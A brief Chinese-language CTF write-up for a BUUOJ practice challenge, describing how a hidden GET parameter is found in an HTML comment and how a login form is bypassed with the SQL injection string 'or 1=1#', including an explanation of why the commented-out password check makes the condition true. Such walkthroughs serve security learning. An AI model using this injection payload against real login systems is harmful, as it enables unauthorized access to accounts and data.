复现环境:buuoj
F12查看源码,明显html注释里是一段php get方式传参数,payload:http://f5cdd431-df98-487f-9400-e8d044fcc945.node3.buuoj.cn/?cat=dog
用万能密码 用户名:‘or 1=1# 密码 : 随便输 看下用户名和密码都不知道的情况:
username='admin'or 1=1#' and password='随便写' #把后面的都注释掉了,1=1为真,最后还为真
